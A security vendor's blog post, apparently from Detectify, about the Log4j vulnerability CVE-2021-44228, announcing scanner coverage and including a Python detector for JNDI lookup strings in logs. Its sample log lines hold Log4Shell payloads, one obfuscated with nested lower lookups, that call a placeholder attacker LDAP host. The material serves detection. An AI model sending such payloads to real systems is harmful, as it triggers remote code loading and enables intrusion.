Critical vulnerability CVE-2021-44228 has set the internet alight over the past few days. Right now, exploit developers and security researchers are still working out the full capabilities the vulnerability provides. Detectify already scans for it: it was submitted as a zero-day by one of the ethical hackers in our Crowdsource community on Friday.

In short, the Log4j vulnerability allows an attacker who can control log messages or log message parameters to execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
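The defensive side of that mechanism is spotting lookup strings in attacker-controlled input before (or after) they reach a vulnerable logger. The following detector is an added example, not code from the original post or from Detectify: it normalises nested `${...}` lookups (the lower/upper and default-value forms Log4j resolves) so that a `${jndi:<scheme>:...}` lookup is found even when split across nested lookups, then runs over a few constructed log lines with placeholder hosts.

```python
import re

# Constructed sample log lines (not from the original post); hosts are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "${env:HOME}"',
]

# Innermost ${...} token: a body with no further '$', '{' or '}' inside it.
INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# Canonical form we alert on: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def resolve_inner(body):
    """Emulate the Log4j lookups that can yield arbitrary text.

    lower/upper transform their argument; 'name:-default' yields the default
    when the lookup name is unknown. Anything else is kept verbatim so the
    canonical string still shows the original lookup name for matching."""
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        return body.partition(":-")[2]
    return "${" + body + "}"


def canonicalize(text, max_rounds=20):
    """Resolve nested lookups inside-out until the string stops changing."""
    for _ in range(max_rounds):
        resolved = INNERMOST_LOOKUP.sub(lambda m: resolve_inner(m.group(1)), text)
        if resolved == text:
            break
        text = resolved
    return text


def detect_jndi(line):
    """Return the JNDI scheme (e.g. 'ldap') found in the line, or None."""
    match = JNDI_LOOKUP.search(canonicalize(line))
    return match.group(1).lower() if match else None


def scan(lines):
    """Return (line_index, scheme) for every line carrying a JNDI lookup."""
    return [(i, s) for i, s in ((i, detect_jndi(l)) for i, l in enumerate(lines)) if s]
```

A hit means the input would trigger a lookup if it reached a vulnerable Log4j instance; the mitigation on the logging side is still to upgrade Log4j or disable message lookups.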

Affected customers will be alerted

On Friday morning, Detectify received the zero-day submission for the vulnerability from an ethical hacker in our Crowdsource community, allowing us to deploy a test for the vulnerability in production. This means that if you’re running Detectify’s Application Scanning, we will check for the vulnerability and alert you if it is detected in your assets. Subsequently, our Security Research team has been iterating on the initial test, improving accuracy. 

This is yet another example of why crowdsourcing security research proves to be the most effective way of staying on top of the ever-changing security landscape. Relying solely on internal security research teams and testing against CVE libraries is a thing of the past. Crowdsourcing vulnerabilities is the quickest way to get vulnerability research from the streets to your hands, as we have seen in these past few days.

New tests are added continuously

Our work is not finished and we will continue to give this our full and utmost attention in the coming days. We highly recommend scanning all critical assets via the Application Scan as soon as you can, and repeatedly throughout the next week, since new tests are being added to our engines continuously.

Please do not hesitate to contact your Customer Success Manager or Support if you have any further questions and we will reply as soon as possible. If you’re not already a customer, click here to sign up for a free trial and immediately start scanning.

Posted by Charlie